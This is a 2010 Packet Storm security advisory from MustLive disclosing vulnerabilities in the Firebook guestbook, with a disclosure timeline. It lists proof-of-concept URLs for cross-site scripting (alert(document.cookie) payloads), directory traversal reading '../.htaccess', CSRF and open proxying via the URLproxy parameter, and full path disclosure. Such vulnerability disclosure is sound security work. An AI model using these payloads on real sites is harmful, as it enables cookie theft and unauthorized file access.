Firebook XSS / XSRF / Directory Traversal / Full Path Disclosure

2010-06-18T00:00:00
ID PACKETSTORM:90759
Type packetstorm
Reporter MustLive
Modified 2010-06-18T00:00:00

Description

                                        
                                            `Hello Bugtraq!  
  
I want to warn you about security vulnerabilities in Firebook.  
  
-----------------------------  
Advisory: Vulnerabilities in Firebook  
-----------------------------  
URL: http://websecurity.com.ua/4124/  
-----------------------------  
Affected products: all versions of Firebook.  
-----------------------------  
Timeline:  
  
27.09.2009 - found vulnerabilities.  
13.04.2010 - announced at my site.  
24.05.2010 - informed developers.  
17.06.2010 - disclosed at my site.  
-----------------------------  
Details:  
  
These are Information Leakage, Cross-Site Request Forgery, Cross-Site  
Scripting, Directory Traversal and Full path disclosure vulnerabilities.  
  
Information Leakage:  
  
http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;  
  
CSRF:  
  
http://site/path_to_firebook_admin/?URLproxy=http://site;  
  
CSRF-attacks on other sites are possible.  
  
XSS:  
  
http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
Directory Traversal:  
  
http://site/path_to_firebook_admin/?param=1;show=../.htaccess;  
  
http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html  
  
Full path disclosure:  
  
http://site/path_to_firebook_admin/?param=1;show=param.txt;  
  
http://site/guestbook/index.html?answer=guestbook/guest/1  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`